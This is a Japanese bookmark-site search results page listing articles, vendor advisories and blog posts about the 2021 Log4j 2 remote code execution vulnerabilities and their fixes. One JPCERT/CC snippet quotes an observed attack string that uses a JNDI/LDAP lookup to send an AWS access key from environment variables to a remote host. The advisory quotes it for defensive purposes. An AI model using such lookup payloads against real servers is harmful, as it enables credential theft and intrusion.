並び順

ブックマーク数

期間指定

  • から
  • まで

1 - 40 件 / 43件

新着順 人気順

log4j2の検索結果1 - 40 件 / 43件

タグ検索の該当結果が少ないため、タイトル検索結果を表示しています。

log4j2に関するエントリは43件あります。 securityセキュリティJava などが関連タグです。 人気エントリには 『Log4j 2のバージョンアップのやりかた - 日々常々』などがあります。
  • Log4j 2のバージョンアップのやりかた - 日々常々

    「Log4j 2に脆弱性があるらしい、バージョンアップしたら治るらしい。」 本日話題のこのテーマで軽く書いておきます。 未完です。 未完公開の言い訳。更新した内容は最後に書いてます。大きな間違いは(今のとこ)ないので、よかった。 2021-12-20追記: 2.17.0 出てますのでコピペしてそのままにせず適宜読み替えてくださいね。 とにかくバージョンを上げよう ……リリースできるかは別の話として。 バージョンを上げられないことには話になりません。ということでとにかくあげましょう。 Log4j 2のようなログライブラリは多くのプロダクトで使用されています。 意識する/しないに関わらず、ログライブラリは何かしら関連があると思うべきでしょう。 使用しているかの調べ方 常時依存ライブラリリストを出力するなどして管理しているのであればそれを見ればいいだけの話ですが、そうでなければ、 mvn dep

    • Log4j2 脆弱性問題における SpringBoot アプリケーションの検証 | DevelopersIO

      先日騒ぎになっていた CVE-2021-44228 についてのアプリケーション側の対応について記載いたします。 緩和策としてすでに AWS WAF での Rule の Update 等が行われているため、AWS サービスの詳細については別途記事を御覧ください。 Log4jの脆弱性対策としてAWS WAFのマネージドルールに「Log4JRCE」が追加されました ここでは SpringBoot をベースとしたアプリケーションへの影響と対応可否の判断についてどのような調査を行ったかを記載します。 ひとまず結論 Spring 側から見解がすでに出ています。 Log4J2 Vulnerability and Spring Boot 以下抜粋します。 Spring Boot users are only affected by this vulnerability if they have switc

        Log4j2 脆弱性問題における SpringBoot アプリケーションの検証 | DevelopersIO
      • 「Log4j」2.17.0にもリモートコード実行の脆弱性 修正バージョン公開

        任意のリモートコードが実行可能になってしまうゼロデイ脆弱性が問題になったJava向けロギングライブラリ「Apache Log4j」に、また脆弱性が見つかった。提供元の米The Apache Software Foundation(ASF)は、脆弱性を修正したバージョンへのアップデートを呼び掛けている。 新たな脆弱性(CVE-2021-44832)は、攻撃者がログ設定ファイルを変更できる権限を持った場合にリモートコードの実行が可能になるというもの。影響範囲はバージョン2.0-alpha7から2.17.0までの2系(ただし特定のセキュリティ修正バージョンを除く)。 CVSS(共通脆弱性評価システム)スコアは6.6で深刻度は「Moderate」。当初のゼロデイ脆弱性(CVSS10.0で「致命的」)より影響レベルは低いが、直前に見つかっていたDoS(サービス拒否)攻撃の脆弱性よりは高く見積もられて

          「Log4j」2.17.0にもリモートコード実行の脆弱性 修正バージョン公開
        • 元・Java専門記者がLog4j 2脆弱性に見た「複雑性と魔神のかけら」 Javaの歴史とバザールの矛盾

          元・Java専門記者がLog4j 2脆弱性に見た「複雑性と魔神のかけら」 Javaの歴史とバザールの矛盾(1/6 ページ) Javaのライブラリ「Apache Log4j 2」に深刻な脆弱性が発見されたことは記憶に新しい。1カ月以上経過した現在も、注意喚起や新たな情報提供が続いている。問題は完全に収束したとはいえない。 今回の記事の主題は脆弱性対策ではない。「Javaの歴史的経緯と、今回騒ぎになっている脆弱性の話を、うまく1本の記事にしてください」という編集部のオファーに応じて書いたものだ。記事の半分は「元・Java専門記者のナイショ話」である。現実の情報システムへの対処が必要な方は、まず下記ページから最新情報をチェックしていただきたい。 IPA Apache Log4j の脆弱性対策について(CVE-2021-44228) Apache Log4j 2公式ページ Log4j 2で今回問題

            元・Java専門記者がLog4j 2脆弱性に見た「複雑性と魔神のかけら」 Javaの歴史とバザールの矛盾
          • log4j2の脆弱性を使って実際に任意コード実行してみました👀

            こんにちは。かえると言います。 Twitterでは https://twitter.com/harukaeru_en で活動しています。日本人です。 日本語版: https://twitter.com/harukaeru1981 何番煎じかわかりませんが、log4j2の任意コード実行ができるようなので、実際に実行してみて、どれぐらい危険なのかをここに書くことにしました。 どういう脆弱性なのか?(TL;DR) 簡単にいうと、Webサイトやゲームサーバなどのテキストボックスで のように書くと、そこのサイトにあるJavaのclassファイルを、標的のサーバ内で実行することができます。(実際はこれとはちょっと書き方は違っていて、これは擬似コードなので動きません) 標的のサーバでは、そのclassファイルを使って自由にコマンドを呼び出せます。 ↓のように、こういったコマンドをjavaファイルの中に書

              log4j2の脆弱性を使って実際に任意コード実行してみました👀
            • Log4j 2はオープンソースソフトウェアなんだから「問題を見つけたらあなたが直せ」?

              Log4j 2はオープンソースソフトウェアなんだから「問題を見つけたらあなたが直せ」?:こうしす! こちら京姫鉄道 広報部システム課 @IT支線(31) 情報セキュリティの啓発を目指した、技術系コメディー自主制作アニメ「こうしす!」の@ITバージョン。第31列車は、「Log4j 2の脆弱性」です。※このマンガはフィクションです。

                Log4j 2はオープンソースソフトウェアなんだから「問題を見つけたらあなたが直せ」?
              • Piro🎉"シス管系女子"シリーズ累計5万部突破!!🎉 on Twitter: "Log4j(2)の脆弱性の原因になった変更がどういう経緯で行われ今に至ったのか、こちらのツイートのリプライツリーで参照されている記事2つと、既に頂いていた指摘で参照されていたイシュートラッカーの情報を見ながら、把握しようとしてみて… https://t.co/eImvzjJMRX"

                Log4j(2)の脆弱性の原因になった変更がどういう経緯で行われ今に至ったのか、こちらのツイートのリプライツリーで参照されている記事2つと、既に頂いていた指摘で参照されていたイシュートラッカーの情報を見ながら、把握しようとしてみて… https://t.co/eImvzjJMRX

                  Piro🎉"シス管系女子"シリーズ累計5万部突破!!🎉 on Twitter: "Log4j(2)の脆弱性の原因になった変更がどういう経緯で行われ今に至ったのか、こちらのツイートのリプライツリーで参照されている記事2つと、既に頂いていた指摘で参照されていたイシュートラッカーの情報を見ながら、把握しようとしてみて… https://t.co/eImvzjJMRX"
                • Apache Log4j2 Security Bulletin (CVE-2021-44228)

                  Initial Publication Date: 2021/12/10 7:20 PM PDT All updates to this issue have moved here. AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service. We strongly en

                    Apache Log4j2 Security Bulletin (CVE-2021-44228)
                  • Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31

                    Subject: Apache Log4j2 Vulnerability - CVE-2021-44228, CVE-2021-45046, CVE-2021-45105, CVE-2021-44832 - ESA-2021-31 ​​Note - We will update this announcement with new details as they emerge from our analysis. Please check back periodically. Update Log Dec 16, 2021 - 04:20 UTC - Update Summary: ECK 1.9 released which automatically adds the JVM option to impacted Elasticsearch clusters managed by EC

                      Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31
                    • Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2

                      You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session. You switched accounts on another tab or window. Reload to refresh your session. Dismiss alert

                        Restrict LDAP access via JNDI by rgoers · Pull Request #608 · apache/logging-log4j2
                      • Log4J2 Vulnerability and Spring Boot

                        Updates: Since this blog post has been published, a new logback 1.2.9 version has been published. While this fixes a security issue, prerequisites for exploits are very different as they "requires write access to logback's configuration file". Log4J also released a new 2.17.0 version with fixes for CVE-2021-45046 and CVE-2021-45105. Spring Boot 2.5.8 and 2.6.2 haven been released and provide depen

                          Log4J2 Vulnerability and Spring Boot
                        • /blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2-jp/

                          • Log4j 2.14.1の脆弱性対応

                            Log4j で強めな脆弱性が発見されました。 詳細は省きますが、ある条件可で任意のコードが実行できるような脆弱性です。 mavenのリポジトリによってはまだ2.15.0のバージョンが上がっていないようで、少し手こずったので記事にします。 (2021/12/10 13時時点) ※自分が所属するログラスでも依存しているライブラリでしたが、今はすでに修正とリリースが完了しています。 影響ライブラリと影響バージョンは log4j-api と log4j-core の 2.0 <= Apache log4j2 <= 2.14.1 です。 対応としては 2.15.0 に上げればいいそうです。 しかし、2021/12/10 13時現在Mavenのサイトでは2.15.0が上がっていないように見えます。 しかし、こちらの repo1.maven.orgのリポジトリにはあるそうで、素直に2.15.0を指定すれ

                              Log4j 2.14.1の脆弱性対応
                            • Log4Shell脆弱性に対する追加の対処が施された「Apache Log4j 2.16.0」がリリース/

                                Log4Shell脆弱性に対する追加の対処が施された「Apache Log4j 2.16.0」がリリース/
                              • /blog/2021/12/microsofts-response-to-cve-2021-44228-apache-log4j2/

                                • 「Apache Log4j 2.15.0」のLog4Shell脆弱性対策は不完全、v2.16.0への更新を ~Java 7ユーザーにはv2.12.2を提供/特定のデフォルト設定以外ではDoSの恐れ

                                    「Apache Log4j 2.15.0」のLog4Shell脆弱性対策は不完全、v2.16.0への更新を ~Java 7ユーザーにはv2.12.2を提供/特定のデフォルト設定以外ではDoSの恐れ
                                  • Apache Log4j 2 CVE-2021-44228 | Docker

                                    Update: 13 December 2021 As an update to CVE-2021-44228, the fix made in version 2.15.0 was incomplete in certain non-default configurations. An additional issue was identified and is tracked with CVE-2021-45046. For a more complete fix to this vulnerability, it’s recommended to update to Log4j2 2.16.0. ————————————————————————————- Original post below has now been updated: 15 December 2021 12:49

                                      Apache Log4j 2 CVE-2021-44228 | Docker
                                    • 「Apache Log4j」に3つ目の脆弱性 ~修正版のv2.17.0が公開/「Log4j 2.15.0」のLog4Shell対策に漏れ、DoS攻撃を受ける可能性

                                        「Apache Log4j」に3つ目の脆弱性 ~修正版のv2.17.0が公開/「Log4j 2.15.0」のLog4Shell対策に漏れ、DoS攻撃を受ける可能性
                                      • Update for Apache Log4j2 Security Bulletin (CVE-2021-44228)

                                        AWS is aware of the recently disclosed issues relating to the open-source Apache “Log4j2" utility (CVE-2021-44228 and CVE-2021-45046). Responding to security issues such as this one shows the value of having multiple layers of defensive technologies, which is so important to maintaining the security of our customers’ data and workloads. We've taken this issue very seriously, and our world-class te

                                          Update for Apache Log4j2 Security Bulletin (CVE-2021-44228)
                                        • log4j2脆弱性!マイクラ全サーバー(バニラ、Spigot、Paperなど)

                                          Javaでログ出力に関するライブラリ「log4j2」で任意のリモートコードを実行される重大な脆弱性が発見されました。 バニラ、Spigot、Paperなど全Minecraft(マイクラ)サーバーに既に攻撃が始まっているとのことですので、管理者は今すぐサーバーを止め、最新バージョンにしてください。 【重要】バニラ、Spigot、Paperなど全Minecraftサーバーでログインに関するライブラリ「log4j2」に任意のリモートコードを実行される重大な脆弱性が発見されました。既に攻撃が始まっているとのことですので、管理者は今すぐサーバーを止め、最新バージョンにしてください。https://t.co/8EWDGwrLWI — SaziumR (@SaziumR) December 10, 2021

                                            log4j2脆弱性!マイクラ全サーバー(バニラ、Spigot、Paperなど)
                                          • 「Log4j2の脆弱性から垣間見えたOSS開発の厳しさ」と「OSS開発者に投げ銭する文化(未来)」について

                                            「Log4j2の脆弱性から垣間見えたOSS開発の厳しさ」と「OSS開発者に投げ銭する文化(未来)」について by nao · 公開済み 2021年12月12日 · 更新済み 2021年12月13日 前書き:災害レベルの脆弱性 本記事は、紛うことなきポエム記事です。Log4j2の脆弱性問題を追っている間に「OSS開発の醜い部分」を目の当たりにしたので、本記事では「せめてOSS開発者が金銭的もしくは他の手段で報われればいいのに」と主張します。 2021年12月10日、Javaのロギングライブラリであるlog4j2は任意コード実行の脆弱性(CVE-2021-44228、内容は以下の引用文を参照)が見つかり、その実行方法の容易さから話題となりました。 Apache Log4jにはLookupと呼ばれる機能があり、ログとして記録された文字列から、一部の文字列を変数として置換します。その内、JNDI

                                              「Log4j2の脆弱性から垣間見えたOSS開発の厳しさ」と「OSS開発者に投げ銭する文化(未来)」について
                                            • Google Cloud recommendations for Apache Log4j 2 vulnerability | Google Cloud Blog

                                              Google Cloud recommendations for investigating and responding to the Apache “Log4j 2” vulnerability Editor's note: This post was updated on 1/14/21 at 1:12pm PST. In this post, we provide recommendations from the Google Cybersecurity Action Team and discuss Google Cloud and Chronicle solutions to help security teams to manage the risk of the Apache “Log4j 2” vulnerability (CVE-2021-44228 and CVE-2

                                                Google Cloud recommendations for Apache Log4j 2 vulnerability | Google Cloud Blog
                                              • 最新版Log4j 2.17.1ではCVE-2021-44832のリモートコード実行が修正されています - Qiita

                                                本記事は2021年12月28日(米国時間)に公開した英語ブログNew Log4j 2.17.1 fixes CVE-2021-44832 remote code execution but it’s not as bad as it soundsの日本語版です。 事前の予測通り、2021年12月28日19時35分頃(GTM/グリニッジ標準時)、ロギングライブラリLog4jに影響を与える別のセキュリティ脆弱性がCVE-2021-44832として公表されました。 この新しいセキュリティ脆弱性 CVE-2021-44832 は、これまで修正されたと考えられていた 2.17.0 までのバージョンに影響します。この脆弱性は、Log4j の 1.x ブランチに影響を与えた CVE-2021-4104 と性質が似ています。 CVE-2021-44832の影響 もし、Log4jの最新の修正バージョンに速や

                                                  最新版Log4j 2.17.1ではCVE-2021-44832のリモートコード実行が修正されています - Qiita
                                                • Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes

                                                  また、JPCERT/CCのハニーポットでは観測されていませんが、AWSのアクセスキー情報を環境変数から窃取しようとする以下の攻撃文字列が存在していることも確認しています。 ${jndi:ldap://${env:AWS_ACCESS_KEY}.(略)} 被害の確認および対処 log4j2は採用事例が非常に多く、また自身がlog4jをプログラムに取り込んだ覚えがなくとも、使用しているライブラリ内に内包されているケースも多くあるものと考えられます。影響確認においては、自組織で用いられているソフトウェア資産の整理もさることながら、既に不正なアクセスが行われているという想定のもと、システム内に不審なファイル等が配置されていないか、また不審な宛先に対して通信が発生していないか確認し、冷静にシステムのアップデートまた回避策の適用を実施していただきたいと思います。 参考情報 [1] Log4j Apac

                                                    Apache Log4j2のRCE脆弱性(CVE-2021-44228)を狙う攻撃観測 - JPCERT/CC Eyes
                                                  • Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability | Microsoft Security Blog

                                                    January 10, 2022 recap – The Log4j vulnerabilities represent a complex and high-risk situation for companies across the globe. This open-source component is widely used across many suppliers’ software and services. By nature of Log4j being a component, the vulnerabilities affect not only applications that use vulnerable libraries, but also any services that use these applications, so customers may

                                                      Guidance for preventing, detecting, and hunting for exploitation of the Log4j 2 vulnerability | Microsoft Security Blog
                                                    • Why was Log4j 2 created?

                                                      From time to time I have come across comments asking the very question posed above. Why another logging framework when SLF4J and Logback already exist? For those who are curious, here is the answer. I started working for Candle Corporation in 1984 where I spent a lot of time developing in C writing code that would make Candle's performance monitoring applications portable to a wide variety of oper

                                                      • Inside the Log4j2 vulnerability (CVE-2021-44228)

                                                        This post is also available in 简体中文, 繁體中文, 日本語, 한국어, Français, Deutsch. In previous versions of this blog post slightly different mitigation techniques were recommended. The Apache Log4j project has updated their official guidance and we have updated this blog post in line with their recommendations Yesterday, December 9, 2021, a very serious vulnerability in the popular Java-based logging package

                                                        • Apache Log4j 2 vulnerability CVE-2021-44228

                                                          A critical security vulnerability has been identified in the popular "Apache Log4j 2" library. This vulnerability is identified as CVE-2021-44228. The Jenkins security team has confirmed that Log4j is not used in Jenkins core. Jenkins plugins may be using Log4j. You can identify whether Log4j is included with any plugin by running the following Groovy script in the Script Console:

                                                          • Apache Log4j 2 で非常に深刻なリモートコード実行の脆弱性が見つかる | スラド デベロッパー

                                                            Apache Log4j 2 でリモートコード実行の非常に深刻な脆弱性 (CVE-2021-44228) が見つかり、修正版の Log4j 2.15.0 が公開された (Apache Log4j Security Vulnerabilities、 The Register の記事、 LunaSec のブログ記事、 The Verge の記事)。 この脆弱性はLog4j 2 の JNDI 機能が攻撃者にコントロールされた LDAP やその他の JNDI 関連エンドポイントに対する保護を行わないというもので、Log4j 2.0-beta9 から 2.14.1 までのバージョンが影響を受ける。攻撃者は脆弱性のある Log4j 2 に特定の文字列をログとして記録させることで、LDAP サーバーから任意のコードを読み込んで実行させることが可能だ。この脆弱性を使用するエクスプロイトが既に公開されており

                                                            • [LOG4J2-313] JNDI Lookup plugin support - ASF JIRA

                                                              Currently, Lookup plugins [1] don't support JNDI resources. It would be really convenient to support JNDI resource lookup in the configuration. One use case with JNDI lookup plugin is as follows: I'd like to use RoutingAppender [2] to put all the logs from the same web application context in a log file (a log file per web application context). And, I want to use JNDI resources look up to determine

                                                              • LogbackからLog4j 2への移行によるアプリケーションのスループット改善 ( JJUG CCC 2021 Fall )

                                                                LogbackからLog4j 2への移行によるアプリケーションのスループット改善 ( JJUG CCC 2021 Fall )

                                                                  LogbackからLog4j 2への移行によるアプリケーションのスループット改善 ( JJUG CCC 2021 Fall )
                                                                • JPCERT/CC、Apache Log4j 2.xの複数の脆弱性に関するまとめページ公開

                                                                  JPCERTコーディネーションセンター(Japan Computer Emergency Response Team Coordination Center:JPCERT/CC)は12月24日、Apache Log4j 2.x(以下、Log4j 2)に報告された「CVE-2021-44228(通称、Log4Shell)」をはじめとする複数の脆弱性に関する状況をまとめた注意喚起ページ「2021年12月に公表されたLog4jの脆弱性について」を公表した。Log4j 2には2021年12月24日の時点で3つの脆弱性が報告されており、いずれも緊急度が高く早急に対処することが推奨されている。 2021年12月に公表されたLog4jの脆弱性について Log4j 2に報告されている脆弱性はCVEベースで次の3種類があり、いずれも「Lookup」と呼ばれる機能に起因するものである。悪用されるとリモートから

                                                                    JPCERT/CC、Apache Log4j 2.xの複数の脆弱性に関するまとめページ公開
                                                                  • Log4j – Log4j 2 Lookups

                                                                    • Apache Log4j2 のセキュリティ速報 (CVE-2021-44228) の更新情報

                                                                      AWS は、オープンソースの Apache「Log4j2」ユーティリティに関連して最近公表された問題 (CVE-2021-44228 および CVE-2021-45046) について認識しています。 このようなセキュリティの問題に対応する際に、複数階層の防御テクノロジーの真価が発揮されます。これは、お客様のデータとワークロードのセキュリティを維持するために極めて重要です。 当社ではこの問題を非常に深刻に受け止め、当社の世界クラスのエンジニアチームが、Amazon が開発した Java ホットパッチ (こちらで入手可能) をすべての AWS のサービスに完全にデプロイしました。このホットパッチは、Java VM を更新して、Java Naming and Directory Interface (JNDI) クラスのロードを無効にし、無害な通知メッセージに置き換えます。これは、CVE-202

                                                                        Apache Log4j2 のセキュリティ速報 (CVE-2021-44228) の更新情報
                                                                      • Log4j 2.17.1 out now, fixes new remote code execution bug

                                                                        HomeNewsSecurityLog4j 2.17.1 out now, fixes new remote code execution bug Apache has released another Log4j version, 2.17.1 fixing a newly discovered remote code execution (RCE) vulnerability in 2.17.0, tracked as CVE-2021-44832. Prior to today, 2.17.0 was the most recent version of Log4j and deemed the safest release to upgrade to, but that advice has now evolved. Fifth Log4j CVE in under a month

                                                                          Log4j 2.17.1 out now, fixes new remote code execution bug
                                                                        • Mackerelの Apache Log4j2 に関する脆弱性 CVE-2021-44228 の影響について - Mackerel お知らせ #mackerelio

                                                                          いつもMackerelをご利用いただきありがとうございます。 2021年12月9日に Apache Log4j2 に関する脆弱性 CVE-2021-44228 が報告されました。 Mackerel のサービスを提供するシステム本体で利用しているライブラリで当該ライブラリへの依存はありましたが、精査した結果、今回の脆弱性の影響を受けないことがわかっております。 また、Mackerel が提供している以下サービス/ソフトウェアには、 Apache Log4j2 を利用していないため影響はございません。 mackerel-agent / mackerel-container-agent 各種公式プラグイン CLIツール mkr 脆弱性についての詳細な情報は、公式情報 や JPCERT を参照してください。 追記(2021年12月16日) Apache Log4j2 への依存があった一部のライブラ

                                                                            Mackerelの Apache Log4j2 に関する脆弱性 CVE-2021-44228 の影響について - Mackerel お知らせ #mackerelio
                                                                          • Log4j 2の脆弱性に対する Cloudflare のセキュリティ対応について

                                                                            Cloudflare では、新しいセキュリティの脆弱性を確認した場合、すぐにチームを集めて次の2つの異なる質問に答えます。(1) お客様のインフラを確実に保護するために何ができるか、(2) 自社の環境を確実に保護するために何ができるか。昨日(2021年12月9日)、人気の高い Java ベースのロギングパッケージである Log4j  に深刻な脆弱性があることが公表された際、当社のセキュリティチームは、1つ目の質問への対応と2つ目の質問への回答を支援するために行動を開始しました。この記事では、2つ目の質問について説明します。 この脆弱性の仕組みの詳細については、別のブログ記事で紹介しています。Log4j2 の脆弱性(CVE-2021-44228)の内部 ですが、要約すると、この脆弱性によって、攻撃者はリモートサーバー上でコードを実行することができます。Java と Log4j が広く使用され

                                                                            • Apache Log4j 2 Vulnerability Security Advisory  |  Google Cloud

                                                                              Accelerate your digital transformation Whether your business is early in its journey or well on its way to digital transformation, Google Cloud can help solve your toughest challenges.

                                                                                Apache Log4j 2 Vulnerability Security Advisory  |  Google Cloud
                                                                              • Ivanti、Apache Log4j 2の脆弱性への対処に関するセキュリティアドバイザリ更新

                                                                                米コンピュータ緊急事態対策チーム(US-CERT: United States Computer Emergency Readiness Team)は1月14日(現地時間)、「Ivanti Updates Log4j Advisory with Security Updates for Multiple Products」において、米IvantiがApache Log4j 2.x(以下、Log4j 2)のCVE-2021-44228をはじめとする脆弱性に関するセキュリティアドバイザリを更新したと伝えた。 Log4j 2に報告されている一連の脆弱性(CVE-2021-44228、CVE-2021-45046、CVE-2021-45105、CVE-2021-44832)は、通称「Log4Shell」とも呼ばれており、悪用されるとリモートから任意のコードを実行されたり、サービス運用妨害(DoS)

                                                                                  Ivanti、Apache Log4j 2の脆弱性への対処に関するセキュリティアドバイザリ更新
                                                                                • log4j2の脆弱性(CVE-2021-44228) - てきとうなメモ

                                                                                  少し調べたのでメモ 概要 外部からの入力をlog4jでそのままログ出力しようとすると、任意のコードを実行できる脆弱性 CVE-2021-45046とv2.16.0について v2.15.0で修正されたかに見えたが、MessagePatternConverter以外の攻撃経路が見つかった。そのため、v2.16.0へのアップデートが推奨される。formatMsgNoLookupsや%m{nolookups}では防げない経路なので、これらによる対策も不十分である。 v2.16.0ではJNDIの機能そのものをデフォルトでオフにして、メッセージ内のLookup機能は削除されている。 ただし、v2.15.0のデフォルト設定でJNDIへのアクセスはlocalhost等の自身へのアクセスに限られているので、危険度は低い localhostのbypass手段が見つかったようだ。そのため、Lookup可能な経路

                                                                                    log4j2の脆弱性(CVE-2021-44228) - てきとうなメモ

                                                                                  新着記事